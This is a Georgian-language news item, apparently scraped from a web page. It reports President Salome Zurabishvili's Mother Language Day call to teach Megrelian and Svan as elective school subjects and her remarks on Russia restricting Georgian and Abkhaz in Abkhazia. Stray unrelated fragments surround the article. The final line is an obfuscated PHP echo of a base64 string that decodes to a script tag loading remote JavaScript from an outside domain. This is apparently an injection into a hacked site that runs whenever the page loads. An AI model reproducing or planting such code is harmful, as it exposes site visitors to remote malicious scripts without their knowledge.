celsiusi
ავერსი შნაიდერი
საქართველოს პრეზიდენტმა სალომე ზურაბიშვილმა დედაენის დღესთან დაკავშირებით სიტყვით გამოსვლისას განაცხადა, საჭიროა სახელმწიფომ იზრუნოს სკოლაში, მეგრულისა და სვანურის არჩევით საგნად სწავლების დაწესებაზე. 
 
პრეზიდენტის თქმით, ქართული კულტურის წინააღმდეგ ომს რუსეთი დღეს აფხაზეთში აგრძელებს და ქართული და აფხაზური ენის დაცვასთან ერთად, გვევალება მეგრულის, სვანურის, ჭანურისა და ლაზურის დაცვა და გადარჩენისთვის ზრუნვა, რაც შესაძლებელია, თუკი სკოლაში არჩევითი სწავლების უფლება დაწესდება მეგრულსა და სვანურზე.
 
„რუსული საოკუპაციო რეჟიმის შედეგად, აფხაზეთში ერთნაირად იზღუდება როგორც აფხაზური, ასევე ქართული ენა. წლიდან წლამდე მცირდება აფხაზურ ენაზე მოსაუბრეთა რიცხვი. გალში და მიმდებარე სოფლებში კი მცხოვრებ ქართველებს ეკრძალებათ ქართულ ენაზე სასკოლო განათლების მიღება. ქართული და აფხაზური ენის დაცვასთან ერთად, რომელიც კონსტიტუციით განსაზღვრულია, გვევალება მეგრულის, სვანურის, ჭანურისა და ლაზურის დაცვა და გადარჩენისთვის ზრუნვა. რამე თუ ეს ენები განუყოფელი ნაწილია ჩვენი კულტურის და წარმოადგენენ უნიკალურ სიმდიდრეს. ამას შევძლებთ თუკი სკოლაში არჩევითი სწავლების უფლებას დავაწესებთ, პირველ რიგში, მეგრულისა და სვანურისათვის”, - განაცხადა პრეზიდენტმა.
765
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");